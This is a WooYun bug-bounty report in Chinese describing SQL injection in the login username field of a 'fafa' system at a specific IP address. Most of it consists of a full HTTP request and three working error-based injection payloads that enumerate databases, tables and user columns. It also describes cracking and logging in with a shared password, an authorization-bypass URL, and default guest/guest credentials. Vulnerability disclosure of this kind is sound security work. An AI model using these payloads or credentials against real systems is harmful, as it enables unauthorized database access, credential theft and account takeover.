WooYun.org

http://103.255.93.100/ fafa系统username 注入

跑数据库跑不出，本来以为到此能证明问题就行了，谁知道浩天大锅介么严格
POST / HTTP/1.1
Host: 103.255.93.100
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://103.255.93.100/
Cookie: bug_uid=0; bug_username=0; bug_logintime=-1; bug_salt=guest
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 53
formhash=14bda08f&login=1&username=admin&password=123
1、爆数据库
formhash=14bda08f&login=1&username=123' and (select 1 from(select count(*),concat(0x7c,( select SCHEMA_NAME from information_schema.SCHEMATA limit 1,1),0x7c,floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a) and '1'='1&password=123

2、爆表
formhash=14bda08f&login=1&username=123' and (select 1 from(select count(*),concat(0x7c,(select table_name from information_schema.tables where table_schema='bug2go' limit §0§,1),0x7c,floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a) and '1'='1&password=123

3、报字段
formhash=14bda08f&login=1&username=123' and (select 1 from(select count(*),concat(0x7c,(select column_name from information_schema.columns where table_name='bug_user' limit 0,1),0x7c,floor(rand(0)*2))x from information_schema.columns group by x limit 0,1)a) and '1'='1&password=123

4、用户名

5、密码

密码均为同一个！汗
破解出密码，登录

然而并没什么用
之前看到别人提交的有越权，试了下果然存在的
http://103.255.93.100/index.php?c=ufr&model=Pioneer+M1&fid=6

另外也是存在guest/guest
证明问题即可，求过求高rank,菜逼不容易啊